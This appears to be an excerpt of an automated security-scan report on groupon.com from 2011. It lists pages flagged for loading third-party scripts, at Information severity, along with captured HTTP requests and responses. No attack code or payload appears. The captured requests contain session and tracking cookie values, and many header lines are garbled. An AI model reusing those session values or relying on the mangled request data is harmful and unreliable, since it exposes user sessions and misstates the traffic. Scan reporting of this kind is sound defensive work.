src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/subscriptions-wVnbKY7b.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.sha256-MHjUM5vi.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/attribute_reader-RS-sBH34.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/cookie-5t3UUKHC.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/multi_steps-opO74hi1.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/alerts-IrgXe2LC.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/disable_on_submit--rDwJEm-.js" type="text/javascript"> </script>...[SNIP]...
5. Cross-domain script include
previous
next
There are 21 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
5.1. http://www.groupon.com/about
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/about
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /about HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:49 GMT-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:49 GMT; HttpOnly86a9ef714ba9a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.2. http://www.groupon.com/blog/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/
Issue detail
The response dynamically includes the following scripts from other domains:http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share
Request
GET /blog/ HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
5.3. http://www.groupon.com/blog/cities/behind-the-deals-recycling/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/cities/behind-the-deals-recycling/
Issue detail
The response dynamically includes the following scripts from other domains:http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share
Request
GET /blog/cities/behind-the-deals-recycling/ HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7.com/.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.2.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 200 OK/blog/xmlrpc.php/blog/?p=5055>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]...
5.4. http://www.groupon.com/ch/getaways/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/ch/getaways/subscriptions/new
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/subscriptions-wVnbKY7b.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/alerts-IrgXe2LC.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/disable_on_submit--rDwJEm-.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/multi_steps-opO74hi1.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /ch/getaways/subscriptions/new HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.9.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:19 GMT-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:20 GMT; HttpOnly6dfb017a54bd4"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/subscriptions-wVnbKY7b.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/multi_steps-opO74hi1.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/alerts-IrgXe2LC.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/disable_on_submit--rDwJEm-.js" type="text/javascript"> </script>...[SNIP]...
5.5. http://www.groupon.com/dallas/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/dallas/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/javascripts/app/now/now_rail_widget_v3.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/deal_page-7A-1PcS1.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/assets/now_backbone_models-9_7BfXaL.js http://assets1.grouponcdn.com/static/assets/now_search_unit--7TtUJWo.js http://assets1.grouponcdn.com/static/assets/now_search_unit_v2-CAep0Zbq.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/flash_messages-bzfOUgTU.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/common/personalize-gzU9Lzjr.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js http://assets1.grouponcdn.com/static/javascripts/views/deals/places_callout-T86uEzc1.js http://maps.google.com/maps/api/js?sensor=false http://platform.twitter.com/widgets.js
Request
GET /dallas/ HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.2.9.1313841127; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; _tpref=cdn; adchemy_id=; division=dallas; b=e359a750-cb22-11e0-9639-0050569541c0; s=e359af3e-cb22-11e0-9639-0050569541c0; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKe59c4a78ecbb0".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/personalize-gzU9Lzjr.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/deal_page-7A-1PcS1.js" type="text/javascript"> </script><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script><script src="http://maps.google.com/maps/api/js?sensor=false" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/now_search_unit--7TtUJWo.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/now_backbone_models-9_7BfXaL.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/now_search_unit_v2-CAep0Zbq.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/javascripts/app/now/now_rail_widget_v3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/views/deals/places_callout-T86uEzc1.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/views/deals/places_callout-T86uEzc1.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/flash_messages-bzfOUgTU.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.6. http://www.groupon.com/dallas/all
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/dallas/all
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/deals/shop_all_deals-1qVNLFzt.js http://assets1.grouponcdn.com/static/javascripts/cache/mustache_templates-MUvgss6H.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /dallas/all HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.4.9.1313841158728; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK-00505695132feda0ddd2fb024e77223485b5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:12 GMT-00505695132feda0ddd2efdc319c4bf28326; domain=.groupon.com; path=/092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:13 GMT; HttpOnly72f5c10b6b19b".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/cache/mustache_templates-MUvgss6H.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/deals/shop_all_deals-1qVNLFzt.js" type="text/javascript"> </script>...[SNIP]...
5.7. http://www.groupon.com/g-team
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/g-team
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /g-team HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:39 GMT-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:39 GMT; HttpOnly933a541c894bf".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.8. http://www.groupon.com/jobs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/jobs
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /jobs HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK-00505695132feda0ddd290b2659c55b1fd6e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:39 GMT-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/5f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:39 GMT; HttpOnly42c8805768d14".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.9. http://www.groupon.com/learn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/learn
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/doc/learn-VoEQMEz_.js http://assets1.grouponcdn.com/static/javascripts/app/learn/fader-FXhvj5RB.js http://assets1.grouponcdn.com/static/javascripts/app/users/demographics-corQwi_S.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /learn HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.8.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:11 GMT-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:12 GMT; HttpOnly9250396ef13f8".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/users/demographics-corQwi_S.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/learn/fader-FXhvj5RB.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/doc/learn-VoEQMEz_.js" type="text/javascript"> </script>...[SNIP]...
5.10. http://www.groupon.com/merchants/welcome
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/merchants/welcome
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/merchants/controller-c-qi0Jwa.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
